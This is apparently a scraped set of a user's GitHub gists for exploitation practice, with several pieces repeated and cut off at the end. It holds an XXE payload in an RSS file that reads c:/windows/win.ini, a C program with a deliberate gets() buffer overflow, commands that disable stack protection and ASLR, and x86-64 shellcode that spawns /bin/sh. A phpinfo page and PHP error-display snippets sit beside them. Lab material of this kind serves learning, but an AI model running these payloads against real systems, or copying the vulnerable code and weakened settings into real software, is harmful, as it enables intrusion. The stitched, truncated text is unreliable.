sl4v sl4v

## hostnames.txt
001
002
003
004
005
006
007
008
009
01

## rss-windows.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
    <title>The Blog</title>
    <link>http://example.com/</link>
    <description>A blog about things</description>
    <lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
    <item>

## directory-list-2.3-small.txt
# directory-list-2.3-small.txt
#
# Copyright 2007 James Fisher
#
# This work is licensed under the Creative Commons
# Attribution-Share Alike 3.0 License. To view a copy of this
# license, visit http://creativecommons.org/licenses/by-sa/3.0/
# or send a letter to Creative Commons, 171 Second Street,
# Suite 300, San Francisco, California, 94105, USA.
#

## phpinfo.php
<?php
phpinfo();
?>

## php_display_errors.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                sl4v
                / php_display_errors.md
            
            
              Created
              June 15, 2016 06:53
            
          
    How to enable displaying errors in PHP

In script:
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);

In php.ini:
display_errors = on

  
## Snippets.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                sl4v
                / Snippets.md
            
            
              Created
              August 8, 2016 09:16
            
          
    Sort and get uniq lines with count

cat txt | sort | uniq -c | sort -nr > out.txt

  
## bof-gets.c
#include <stdio.h>
int main(int argc, char *argv[]) {
  char buf[256];
  gets(buf);
  printf("You entered: %s\n", buf);
}

## install-r2.sh
wget https://github.com/radare/radare2/archive/1.3.0.tar.gz
tar xf 1.3.0.tar.gz
cd radare2-1.3.0
sys/install.sh

## gcc.sh
apt install execstack
gcc -m64 -fno-stack-protector -z execstack -o bof bof-gets.c
echo 0 > /proc/sys/kernel/randomize_va_space

## shellcode.asm
xor rdx, rdx
push rdx
mov rax, 0x68732f2f6e69622f
push rax
mov rdi, rsp
xor rsi, rsi
xor rax, rax
mov al, 0x3b
syscall
	<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE title [ <!ELEMENT title ANY >
	<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
	<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
	<title>The Blog</title>
	<link>http://example.com/</link>
	<description>A blog about things</description>
	<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
	<item>
	# directory-list-2.3-small.txt
	#
	# Copyright 2007 James Fisher
	#
	# This work is licensed under the Creative Commons
	# Attribution-Share Alike 3.0 License. To view a copy of this
	# license, visit http://creativecommons.org/licenses/by-sa/3.0/
	# or send a letter to Creative Commons, 171 Second Street,
	# Suite 300, San Francisco, California, 94105, USA.
	#
	#include <stdio.h>
	int main(int argc, char *argv[]) {
	char buf[256];
	gets(buf);
	printf("You entered: %s\n", buf);
	}
	wget https://github.com/radare/radare2/archive/1.3.0.tar.gz
	tar xf 1.3.0.tar.gz
	cd radare2-1.3.0
	sys/install.sh
	apt install execstack
	gcc -m64 -fno-stack-protector -z execstack -o bof bof-gets.c
	echo 0 > /proc/sys/kernel/randomize_va_space
	xor rdx, rdx
	push rdx
	mov rax, 0x68732f2f6e69622f
	push rax
	mov rdi, rsp
	xor rsi, rsi
	xor rax, rax
	mov al, 0x3b
	syscall